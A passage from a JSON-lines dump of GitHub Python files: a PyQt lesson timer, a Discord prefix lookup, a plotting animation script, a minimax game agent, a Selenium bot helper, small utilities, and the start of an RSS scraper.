divisions = dataset_splitter_by_time(list(range(34290)), 0.1, 0.2, 0.7, 4)\n print(len(divisions['dev']), len(divisions['test']), len(divisions['train']))\n","repo_name":"BMarcin/PetraRQ","sub_path":"src/DatasetSplitter/DatasetSplitter.py","file_name":"DatasetSplitter.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28377038959","text":"import json\nimport webbrowser as wb\nimport time\nimport pyperclip as pc\nimport datetime\nfrom datetime import datetime\nfrom PyQt5 import QtCore, QtWidgets, QtGui\nimport threading\nimport sys\nimport os\n\n\ndef dayDefiner(day):\n if day == 0:\n return \"Monday\"\n elif day == 1:\n return \"Tuesday\"\n elif day == 2:\n return \"Wednesday\"\n elif day == 3:\n return \"Thursday\"\n elif day == 4:\n return \"Friday\"\n elif day == 5:\n return \"Saturday\"\n elif day == 6:\n return \"Sunday\"\n else:\n return \"Not Defined\"\n\n\nclass mainWindowUi(object):\n def __init__(self, mainWindow):\n mainWindow.setObjectName(\"MainWindow\")\n mainWindow.resize(531, 331)\n mainWindow.setAutoFillBackground(False)\n mainWindow.setStyleSheet(\"background-color: #343233;\")\n\n # setting Up the Central QtWidgets\n self.centralWidget = QtWidgets.QWidget(mainWindow)\n self.centralWidget.setObjectName(\"centralWidget\")\n\n # the vertical Layout Widgets Creation\n self.vlw = QtWidgets.QWidget(self.centralWidget)\n self.vlw.setGeometry(QtCore.QRect(310, 20, 181, 211))\n self.vlw.setObjectName(\"vlw\")\n\n # the vertical Layout Creation\n self.vl = QtWidgets.QVBoxLayout(self.vlw)\n self.vl.setContentsMargins(0, 0, 0, 0)\n self.vl.setObjectName(\"vl\")\n\n # setting up the Fonts\n font = QtGui.QFont()\n font.setFamily(\n \"-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,\"\n \"Segoe UI Symbol\")\n font.setPointSize(-1)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(37)\n\n # creating the Label\n self.A1 = QtWidgets.QLabel(self.vlw)\n self.A1.setFont(font)\n\n # styling the 'Today Is Monday' Text\n self.A1.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A1.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A1.setObjectName(\"A1\")\n self.vl.addWidget(self.A1)\n\n # creating the clock label\n self.A2 = QtWidgets.QLabel(self.vlw)\n\n # styling the clock label\n self.A2.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A2.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A2.setObjectName(\"A2\")\n self.vl.addWidget(self.A2)\n\n # creating the Editing Button\n self.Edit = QtWidgets.QPushButton(self.vlw)\n\n # styling the Button\n font = QtGui.QFont()\n font.setFamily(\"Helvetica Neue,Helvetica,arial,freesans,clean,sans-serif\")\n font.setPointSize(-1)\n font.setBold(True)\n font.setItalic(False)\n font.setUnderline(False)\n font.setWeight(62)\n font.setStrikeOut(False)\n self.Edit.setFont(font)\n self.Edit.setStyleSheet(\"background-color: rgb(253, 219, 58);\\n\"\n \"font: 25px/1.7 normal normal;\\n\"\n \"font-family: \\\"Helvetica Neue\\\", Helvetica, arial, freesans, clean, sans-serif;\\n\"\n \"display: inline-block;\\n\"\n \"padding: .5em 1em;\\n\"\n \"line-height: inherit;\\n\"\n \"font-size: inherit;\\n\"\n \"font-weight: 500;\\n\"\n \"text-decoration: none;\\n\"\n \"border-radius: 5px;\\n\"\n \"color: #343233;\\n\"\n \"background-color: #ffd152;\\n\"\n \"\")\n self.Edit.setObjectName(\"Edit\")\n self.vl.addWidget(self.Edit)\n\n # creating the second vertical Layout Widget\n self.vlw_2 = QtWidgets.QWidget(self.centralWidget)\n self.vlw_2.setGeometry(QtCore.QRect(40, 20, 219, 211))\n self.vlw_2.setObjectName(\"vlw_2\")\n self.vl_2 = QtWidgets.QVBoxLayout(self.vlw_2)\n self.vl_2.setContentsMargins(0, 0, 0, 0)\n self.vl_2.setObjectName(\"vl_2\")\n\n # creating the 'Next lesson is' label\n self.A3 = QtWidgets.QLabel(self.vlw_2)\n\n # styling the label\n font = QtGui.QFont()\n font.setFamily(\n \"-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,\"\n \"Segoe UI Symbol\")\n font.setPointSize(-1)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(37)\n self.A3.setFont(font)\n self.A3.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A3.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A3.setObjectName(\"A3\")\n self.vl_2.addWidget(self.A3)\n\n # creating the 'Starts In' label\n self.A4 = QtWidgets.QLabel(self.vlw_2)\n self.A4.setMaximumSize(QtCore.QSize(16777198, 16777215))\n\n # styling the label\n font = QtGui.QFont()\n font.setFamily(\n \"-apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,\"\n \"Segoe UI Symbol\")\n font.setPointSize(-1)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(37)\n self.A4.setFont(font)\n self.A4.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.A4.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.A4.setObjectName(\"A4\")\n self.vl_2.addWidget(self.A4)\n\n # creating the (time left) label\n self.timeLeft = QtWidgets.QLabel(self.vlw_2)\n\n # styling the label\n self.timeLeft.setStyleSheet(\" font: 25px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.timeLeft.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.timeLeft.setObjectName(\"timeLeft\")\n self.vl_2.addWidget(self.timeLeft)\n\n # creating the reminder label\n self.remind = QtWidgets.QLabel(self.centralWidget)\n self.remind.setGeometry(QtCore.QRect(20, 270, 241, 21))\n\n # styling the label\n self.remind.setStyleSheet(\" font: 10px/1.5 normal normal;\\n\"\n \"font-family: -apple-system, BlinkMacSystemFont, \\\"Segoe UI\\\", Helvetica, Arial, \"\n \"sans-serif, \\\"Apple Color Emoji\\\", \\\"Segoe UI Emoji\\\", \\\"Segoe UI Symbol\\\";\\n \"\n \" font-weight: 300;\\n\"\n \" color: #efdab9;\\n\"\n \" background-color: #343233;\\n\"\n \"text-align: center;\")\n self.remind.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.remind.setObjectName(\"remind\")\n mainWindow.setCentralWidget(self.centralWidget)\n\n # creating the MenuBar\n self.menuBar = QtWidgets.QMenuBar(mainWindow)\n self.menuBar.setGeometry(QtCore.QRect(0, 0, 531, 21))\n self.menuBar.setObjectName(\"menuBar\")\n mainWindow.setMenuBar(self.menuBar)\n\n # creating the StatusBar\n self.statusBar = QtWidgets.QStatusBar(mainWindow)\n self.statusBar.setObjectName(\"statusBar\")\n mainWindow.setStatusBar(self.statusBar)\n\n # calling the translate Ui\n self.translateUi(mainWindow)\n QtCore.QMetaObject.connectSlotsByName(mainWindow)\n\n def translateUi(self, mainWindow):\n _translate = QtCore.QCoreApplication.translate\n mainWindow.setWindowTitle(_translate(\"MainWindow\", \"Timer\"))\n self.A1.setText(_translate(\"MainWindow\", \"Monday\"))\n self.A2.setText(_translate(\"MainWindow\", \"Not Set\"))\n self.Edit.setText(_translate(\"MainWindow\", \"Edit\"))\n self.A3.setText(_translate(\"MainWindow\", \"Next Lesson\"))\n self.A4.setText(_translate(\"MainWindow\", \"Starts\"))\n self.timeLeft.setText(_translate(\"MainWindow\", \"In Few Minutes?\"))\n\n self.Edit.clicked.connect(lambda: os.startfile('C:/Users/himas/PycharmProjects/School.Py/data.json'))\n\n def setTime(self, Time):\n self.A2.setText(Time)\n\n def setDay(self, Day):\n self.A1.setText(f\"{Day}\")\n\n def setNoLeft(self):\n self.A3.setText(\"\")\n self.A4.setText(\"No Lessons :D\")\n self.timeLeft.setText(\"\")\n\n def setTimeLeft(self, Time, Hours):\n now = datetime.now()\n hour = now.strftime(\"%H\")\n minutes = now.strftime(\"%M\")\n if hour[0:1] == '0':\n hour = hour[1:2]\n if minutes[0:1] == '0':\n minutes = minutes[1:2]\n hour = int(hour)\n minutes = int(minutes)\n\n if Hours == hour and Time > minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Time - minutes} Minutes')\n\n elif Time == minutes and Hours == hour:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(\"Right Now\")\n\n elif Hours > hour and Time > minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Hours - hour}h and {Time - minutes}m')\n\n elif Hours > hour and Time == minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Hours - hour} Hours')\n\n elif Hours == hour + 1 and Time < minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {abs(Time + 60 - minutes)} Minutes')\n\n elif Hours > hour and Time < minutes:\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n self.timeLeft.setText(f'in {Hours - hour - 1}h and {abs(Time + 60 - minutes)}m')\n\n elif Hours < hour:\n pass\n\n elif Hours == hour and Time < minutes:\n pass\n\n else:\n print(\"Something's Wrong with setTimeLeft()\")\n\n def signIn(self, meetingLink):\n wb.open(meetingLink)\n pc.copy(meetingLink)\n self.A3.setText(\"\")\n self.A4.setText(\"Link Copied!\")\n self.timeLeft.setText(\"\")\n time.sleep(2)\n self.A3.setText(\"Next Lesson\")\n self.A4.setText(\"Starts\")\n\n def scheduler(self):\n while True:\n with open('C:/Users/himas/PycharmProjects/School.Py/data.json', 'r') as json_file:\n today = str(datetime.today().weekday())\n data = json.load(json_file)\n now = datetime.now()\n exact_time = str(now.strftime(\"%H:%M\"))\n for i in data['days'][today]:\n if exact_time == i:\n meeting_link = (data['days'][today][exact_time])\n self.signIn(meeting_link)\n time.sleep(60)\n if stop_threads:\n break\n time.sleep(1)\n\n def timerdisplay(self):\n while True:\n now = datetime.now()\n exact_time = str(now.strftime(\"%H:%M:%S\"))\n self.setTime(exact_time)\n time.sleep(1)\n global stop_threads\n if stop_threads:\n break\n\n def timeLeftDefiner(self):\n while True:\n with open('C:/Users/himas/PycharmProjects/School.Py/data.json', 'r') as json_file:\n data = json.load(json_file)\n today = str(datetime.today().weekday())\n now = datetime.now()\n f_lessons = []\n hours = now.strftime(\"%H\")\n minutes = now.strftime(\"%M\")\n if hours[0:1] == '0':\n hours = hours[1:2]\n if minutes[0:1] == '0':\n minutes = minutes[1:2]\n hours = int(hours)\n minutes = int(minutes)\n\n for i in data['days'][today]:\n x_hours = i[0:2]\n x_minutes = i[3:5]\n if x_hours[0:1] == 0:\n x_hours = x_hours[1:2]\n if x_minutes[0:1] == 0:\n x_minutes = x_minutes[1:2]\n x_hours = int(x_hours)\n x_minutes = int(x_minutes)\n\n if x_hours == hours and x_minutes == minutes:\n self.setTimeLeft(0, 0)\n elif x_hours < hours:\n pass\n elif x_hours >= hours:\n if x_hours == hours and x_minutes >= minutes:\n f_lessons.append(i)\n elif x_hours == hours and x_minutes < minutes:\n pass\n elif x_hours > hours:\n f_lessons.append(i)\n else:\n print('Something is wrong in timeLeftDefiner()')\n smallest = f_lessons[0] if f_lessons else None\n for x in f_lessons:\n x_hours = x[0:2]\n x_minutes = x[3:5]\n smallest_hour = smallest[0:2]\n smallest_minute = smallest[3:5]\n if smallest_hour[0:1] == 0:\n smallest_hour = smallest_hour[1:2]\n if smallest_minute[0:1] == 0:\n smallest_minute = smallest_minute[1:2]\n if x_hours[0:1] == 0:\n x_hours = x_hours[1:2]\n if x_minutes[0:1] == 0:\n x_minutes = x_minutes[1:2]\n x_hours = int(x_hours)\n x_minutes = int(x_minutes)\n smallest_hour = int(smallest_hour)\n smallest_minute = int(smallest_minute)\n if x_hours < smallest_hour:\n smallest = x\n elif x_hours == smallest_hour:\n if x_minutes < smallest_minute:\n smallest = x\n else:\n pass\n else:\n pass\n try:\n if not f_lessons:\n self.setNoLeft()\n else:\n final_hour = smallest[0:2]\n final_minute = smallest[3:5]\n if final_hour[0:1] == 0:\n final_hour = final_hour[1:2]\n if final_minute[0:1] == 0:\n final_minute = final_minute[1:2]\n final_hour = int(final_hour)\n final_minute = int(final_minute)\n self.setTimeLeft(final_minute, final_hour)\n except Exception as Ex:\n print(Ex)\n if stop_threads:\n break\n time.sleep(1)\n\n def daySetter(self):\n today = int(datetime.today().weekday())\n day = dayDefiner(today)\n self.setDay(day)\n\n\nif __name__ == '__main__':\n # and here I run everything...\n stop_threads = False\n app = QtWidgets.QApplication(sys.argv)\n app_icon = QtGui.QIcon()\n app_icon.addFile('Bcon.png')\n app.setWindowIcon(app_icon)\n\n MainWindow = QtWidgets.QMainWindow()\n ui = mainWindowUi(MainWindow)\n ui.daySetter()\n timer = threading.Thread(target=ui.timerdisplay)\n timer.start()\n schedul = threading.Thread(target=ui.scheduler)\n schedul.start()\n lefttimer = threading.Thread(target=ui.timeLeftDefiner)\n lefttimer.start()\n MainWindow.show()\n ret = app.exec_()\n stop_threads = True\n sys.exit(ret)\n","repo_name":"Hopeful-ly/school.py","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":17937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13801825585","text":"import discord\n\nfrom bot.settings import DEFAULT_PREFIX\nfrom models.my_orm import MaybeAcquire, Table\n\n\nasync def get_prefix(bot, msg: discord.message.Message):\n if not msg.guild:\n return DEFAULT_PREFIX\n else:\n sql = f\"\"\"\n SELECT bot_prefix FROM guilds WHERE guild_id = {msg.guild.id}\n \"\"\"\n async with MaybeAcquire(connection=None, pool=Table._pool) as con:\n data = await con.fetchrow(sql)\n # data = await DB.sql_fetch(sql, True)\n prefix = data.get('bot_prefix')\n return prefix","repo_name":"zyzycode/monster_bot","sub_path":"utils/get_prefix.py","file_name":"get_prefix.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15341923211","text":"from __future__ import annotations\n\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.animation import FuncAnimation\n\nsns.set(font_scale=2)\n\nSCRIPTS_FOLDER_PATH = Path('..')\nDATA_PATH = SCRIPTS_FOLDER_PATH / 'data' / 'memory_demo'\nINPUT_PATHS = [\n DATA_PATH / 'low_memory_control' / 'cell_output.csv',\n DATA_PATH / 'high_memory_control' / 'cell_output.csv',\n]\nOUTPUT_PATH = SCRIPTS_FOLDER_PATH / 'Video S2' / 'Supplementary Video S2.mp4'\n\n\ndef main(\n input_paths: list[Path],\n output_path: Path,\n) -> None:\n \"\"\"Main function of this script.\"\"\"\n dfs = []\n for path in input_paths:\n df = pd.read_csv(path, index_col=0)\n df['memory'], df['treatment'] = get_info_from_path_name(path=path)\n dfs.append(df)\n data = pd.concat(dfs, ignore_index=True)\n data['$f_m$'] = data['memory'].astype(str)\n fig, (top_ax, bottom_ax) = plt.subplots(figsize=(16, 16), nrows=2)\n grouped_data = (\n data\n .groupby(['$f_m$', 'colony_name', 'simulation_hours'])['signal_value']\n .mean()\n .reset_index()\n .rename(columns={'signal_value': 'colony_signal_mean'})\n )\n grouped_data['colony_signal_variance'] = (\n data\n .groupby(['$f_m$', 'colony_name', 'simulation_hours'])['signal_value']\n .var()\n .reset_index(drop=True)\n )\n grouped_data['colony_size'] = (\n data\n .groupby(['$f_m$', 'colony_name', 'simulation_hours'])['signal_value']\n .count()\n .reset_index(drop=True)\n )\n grouped_data['colony_size_jitter'] = grouped_data['colony_size'] + grouped_data['$f_m$'].apply(\n lambda value: np.random.normal(loc={'0.0': -0.2, '0.9': +0.2}.get(value), scale=0.05)\n )\n max_hours = grouped_data[\"simulation_hours\"].max()\n\n def update(hour: float) -> None:\n \"\"\"Updates the plot.\"\"\"\n print('\\b' * 100, end='')\n print( f'Video is: {round(100 * (hour/max_hours), 1)}% done...', end='')\n hour_data = grouped_data.loc[grouped_data['simulation_hours'] == hour]\n for ax, label in (\n (top_ax, 'mean'),\n (bottom_ax, 'variance')\n ):\n ax.clear()\n sns.scatterplot(\n ax=ax,\n data=hour_data,\n x='colony_size_jitter',\n y=f'colony_signal_{label}',\n hue='$f_m$',\n palette=['#029e73', '#de8f05'],\n )\n ax.set_title(f'Distribution of signal {label} in colonies (N=100 per $f_m$)')\n ax.set_xlabel('Colony size')\n ax.set_xticks([tick for tick in ax.get_xticks() if tick.is_integer()])\n if ax.get_xlim()[-1] < 5:\n ax.set_xlim(right=5)\n ax.set_ylabel(f'Signal {label} in colonies')\n top_ax.set_ylim(-1, 1)\n top_ax.set_yticks([-1, 0, 1])\n bottom_ax.set_ylim(0, 0.7)\n if bottom_ax.get_yticks()[-1] == 0:\n bottom_ax.set_yticks([])\n fig.suptitle(f'Simulation time: {round(hour, 1)} hours')\n fig.tight_layout()\n\n ani = FuncAnimation(fig, update, frames=grouped_data['simulation_hours'].unique())\n ani.save(str(output_path))\n\n\ndef get_info_from_path_name(path: Path) -> tuple[float, str]:\n \"\"\"Returns the memory and treatment based on the Path's words.\"\"\"\n memory = 0.0 if 'low' in path.as_posix().lower() else 0.9\n treatment = 'TMZ' if 'tmz' in path.as_posix().lower() else 'Control'\n return memory, treatment\n\n\nif __name__ == '__main__':\n main(input_paths=INPUT_PATHS, output_path=OUTPUT_PATH)\n","repo_name":"jfaccioni/clovars","sub_path":"scripts/Figures and Videos/Video S2/render_video_S2.py","file_name":"render_video_S2.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13443409812","text":"# -*- coding: utf-8 -*-\n__author__ = 'Sivasubramanian Chandrasegarampillai, Walter Curnow'\n__email__ = 'rchandra@uci.edu,wcurnow@uci.edu'\nimport time\nfrom assignment2 import Player, State, Action\n\n# Yujia Li A98064697\n# Ze Li A11628864\n# Wei Wang A97031723\n\n__author__ = 'yul200@ucsd.edu, zel014@ucsd.edu, wew026@ucsd.edu'\n\nclass YourCustomPlayer(Player):\n @property\n def name(self):\n \"\"\"Returns the name of this agent. Try to make it unique!\"\"\"\n return 'whatever'\n\n def move(self, state):\n \"\"\"Calculates the absolute best move from the given board position using magic.\n \n Args:\n state (State): The current state of the board.\n\n Returns:\n your next Action instance\n \"\"\"\n max_depth = state.M * state.N - sum([1 for row in state.board for cell in row if cell > 0])\n current_depth = 0\n return_state = None\n trans = {}\n while(current_depth <= max_depth):\n return_state = self.min_max(state, current_depth, trans)\n current_depth = current_depth + 1\n return return_state\n\n def feel_like_thinking(self, start_time):\n if time.time() - start_time <= 1:\n return True\n return False\n\n # implement iterative depping alpha beta + heuristic function at depth limit\n # improve the heuristic function\n # add move ordering based on the best moves from previous iteration \n # in iterative deepening\n def do_the_magic(self, state):\n \"\"\"we did not use this function at this time\"\"\"\n\n def min_max(self, state, current_depth, trans):\n trans.clear()\n if current_depth == 0:\n if(state.is_terminal()):\n return state.utility(player)\n return self.evaluate(state, state.to_play.color)\n player = state.to_play\n state_list = state.actions()\n store = []\n a = float(\"-infinity\")\n b = float(\"infinity\")\n for i in range(0, len(state_list)):\n store.insert(i, self.min_value(state.result(state_list[i]),player, a, b, trans, \n current_depth - 1))\n val = float(\"-infinity\")\n for i in range(0, len(store)):\n if store[i] > val: \n val = store[i]\n index = i\n return state_list[index]\n\n def max_value(self, state, player,a,b,trans, current_depth):\n # if terminal test is true, return utility\n # val <- negative infinity\n # for each child in Action do\n # val <- max(val, min_value(child, a, b))\n # if val >= b then return val\n # a <- max(a, val)\n # return val\n if current_depth == 0:\n if(state.is_terminal()): return state.utility(player)\n if state in trans: return trans[state]\n return self.evaluate(state, state.to_play.color) \n if state in trans:\n return trans[state]\n if(state.is_terminal()):\n return state.utility(player)\n val_return = float(\"-infinity\")\n action_list = state.actions()\n for i in range(0, len(action_list)):\n value = self.min_value(state.result(action_list[i]),player, a, b, trans,\n current_depth - 1)\n if value > val_return:\n val_return = value\n if val_return >= b: return val_return\n if val_return > a: a = val_return\n trans[state.result(action_list[i])] = val_return\n return val_return\n def min_value(self, state, player,a,b,trans, current_depth):\n # if terminal test is true, return utility\n # val <- positive infinity\n # for each child in Action do\n # val <- min(val, max_value(child))\n # return val\n if current_depth == 0:\n if(state.is_terminal()): return state.utility(player)\n if state in trans: return trans[state]\n return self.evaluate(state, state.to_play.color) \n if state in trans:\n return trans[state]\n if(state.is_terminal()):\n return state.utility(player)\n val_return = float(\"infinity\")\n action_list = state.actions()\n for i in range(0, len(action_list)):\n value = self.max_value(state.result(action_list[i]),player, a, b, trans,\n current_depth - 1)\n if(value < val_return):\n val_return = value\n if val_return <= a: return val_return\n if val_return < b: b = val_return\n trans[state.result(action_list[i])] = val_return\n return val_return\n\n def evaluate(self, state, color):\n chase_list = []\n for i in range(0, len(state.board)):\n for j in range(0, len(state.board[0])):\n if state.board[i][j] == color:\n chase_list.append(self.chase(i, j, state, color))\n chase_list.sort()\n #print(chase_list[len(chase_list)-1])\n #print(state.K)\n return round(chase_list[len(chase_list)-1],1)/ round(state.K, 1)\n\n def chase(self, i, j, state, color):\n return_list = []\n #left, chase right\n if j == 0 or j > 0 and state.board[i][j-1] != color:\n count = 0\n jj = j\n while jj < len(state.board[0]) and state.board[i][jj] == color:\n count = count + 1\n jj = jj + 1\n return_list.append(count)\n #right, chase left\n if j == len(state.board[0]) - 1 or j < len(state.board[0]) - 1 and state.board[i][j+1] != color:\n count = 0\n jj = j\n while jj >= 0 and state.board[i][jj] == color:\n count = count + 1\n jj = jj - 1\n return_list.append(count)\n #up, chase down\n if i == 0 or i > 0 and state.board[i-1][j] != color:\n count = 0\n ii = i\n while ii < len(state.board) and state.board[ii][j] == color:\n count = count + 1\n ii = ii + 1\n return_list.append(count)\n #down, chase up\n if i == len(state.board) - 1 or i < len(state.board) - 1 and state.board[i+1][j] != color:\n count = 0\n ii = i\n while ii >= 0 and state.board[ii][j] == color:\n count = count + 1\n ii = ii - 1\n return_list.append(count)\n #left-up, chase right-down\n if i == 0 or j == 0 or i>0 and j>0 and state.board[i-1][j-1] != color:\n count = 0\n ii = i\n jj = j\n while jj < len(state.board[0]) and ii < len(state.board) and state.board[ii][jj] == color:\n count = count + 1\n ii = ii + 1\n jj = jj + 1\n return_list.append(count) \n #right-down, chase left-up\n if j == len(state.board[0]) - 1 or i == len(state.board) - 1 or j < len(state.board[0]) - 1 and i < len(state.board) - 1 and state.board[i+1][j+1] != color:\n count = 0\n ii = i\n jj = j\n while ii >= 0 and jj >= 0 and state.board[ii][jj] == color:\n count = count + 1\n ii = ii - 1\n jj = jj - 1\n return_list.append(count)\n #right-up, chase left-down\n if i == 0 or j == len(state.board[0]) - 1 or i>0 and j < len(state.board[0]) - 1 and state.board[i-1][j+1] != color:\n count = 0\n ii = i\n jj = j\n while jj >= 0 and ii < len(state.board) and state.board[ii][jj] == color:\n count = count + 1\n ii = ii + 1\n jj = jj - 1\n return_list.append(count)\n #left-down, chase right-up\n if j == 0 or i == len(state.board) - 1 or j>0 and i < len(state.board) - 1 and state.board[i+1][j-1] != color:\n count = 0\n ii = i\n jj = j\n while ii >= 0 and jj < len(state.board[0]) and state.board[ii][jj] == color:\n count = count + 1\n ii = ii - 1\n jj = jj + 1\n return_list.append(count)\n return_list.sort()\n return return_list[len(return_list)-1]\n\n","repo_name":"GloriaGreatGreat/CSE150AI","sub_path":"assignment2/solutions/save/p4_custom_player_save.py","file_name":"p4_custom_player_save.py","file_ext":"py","file_size_in_byte":8233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40998726175","text":"from selenium import webdriver\n\n\n# Returns the commands from the post\n\ndef Return_Commands(driver):\n driver.implicitly_wait(10)\n post_box = driver.find_element_by_id(\"bodyDisplay\")\n mention = post_box.find_element_by_xpath(\".//a[@href='/t5/user/viewprofilepage/user-id/4013800']\")\n driver.execute_script(\"arguments[0].scrollIntoView();\", mention)\n text = mention.find_element_by_xpath(\".//..\").text\n\n full_command = text.removeprefix('@EddyK_Bot') # Later change to the bot's name\n\n return full_command","repo_name":"Eddy-M-K/HP-Support-Community-Bot","sub_path":"Return_Commands.py","file_name":"Return_Commands.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14146551601","text":"class Power():\n def check(N,P):\n N = int(N)\n P = int(P)\n \n if P == 1:\n return N\n \n if P != 1:\n return (N*Power.check(N,P-1))\n\nT = Power\narr = input().split(\",\")\nN = arr[0]\nP = arr[1]\ntest = T.check(N,P)\nprint(\"{0}^{1} = {2}\".format(N,P,test))\n","repo_name":"Abhijit2123/Leetcode","sub_path":"power_using_recurssion.py","file_name":"power_using_recurssion.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35350269473","text":"\n\nfrom pathlib import Path\n\nfrom AlgorithmicStrategy import (\n Standarder\n)\n\nraw_data_folder = Path.cwd() / \"DATA/ML/RAW\"\nnorm_data_folder = Path.cwd() / \"DATA/ML/NORM\"\nlabel_data_folder = Path.cwd() / \"DATA/ML/LABEL\"\n\nif not norm_data_folder.exists():\n norm_data_folder.mkdir(parents=True, exist_ok=True)\n\nstandard = Standarder(file_folder=raw_data_folder, train=True)\nstandard.fresh_files()\nstandard.read_files()\nstandard.fit_transform_for_files(output=norm_data_folder)\n\n","repo_name":"Me2yhm/Algorithmic-Trading","sub_path":"AlgorithmicStrategy/TWAP_VWAP/norm_generate.py","file_name":"norm_generate.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30497541747","text":"import feedparser\nimport time\nimport os\nimport re\nimport pytz\nfrom datetime import datetime\nimport yagmail\nimport requests\nimport markdown\nimport json\nimport shutil\nfrom urllib.parse import urlparse\nfrom multiprocessing import Pool, Manager\n\n\n\ndef get_rss_info(feed_url, index, rss_info_list):\n result = {\"result\": []}\n request_success = False\n # 如果请求出错,则重新请求,最多五次\n for i in range(3):\n if(request_success == False):\n try:\n headers = {\n # 设置用户代理头(为狼披上羊皮)\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\",\n \"Content-Encoding\": \"gzip\"\n }\n # 三次分别设置8, 16, 24秒钟超时\n feed_url_content = requests.get(feed_url, timeout= (i+1)*8 ,headers = headers).content\n feed = feedparser.parse(feed_url_content)\n feed_entries = feed[\"entries\"]\n feed_entries_length = len(feed_entries)\n print(\"==feed_url=>>\", feed_url, \"==len=>>\", feed_entries_length)\n for entrie in feed_entries[0: feed_entries_length-1]:\n title = entrie[\"title\"]\n link = entrie[\"link\"]\n date = time.strftime(\"%Y-%m-%d\", entrie[\"published_parsed\"])\n\n title = title.replace(\"\\n\", \"\")\n title = title.replace(\"\\r\", \"\")\n\n result[\"result\"].append({\n \"title\": title,\n \"link\": link,\n \"date\": date\n })\n request_success = True\n except Exception as e:\n print(feed_url+\"第+\"+str(i)+\"+次请求出错==>>\",e)\n pass\n else:\n pass\n\n rss_info_list[index] = result[\"result\"]\n print(\"本次爬取==》》\", feed_url, \"<<<===\", index, result[\"result\"])\n # 剩余数量\n remaining_amount = 0\n\n for tmp_rss_info_atom 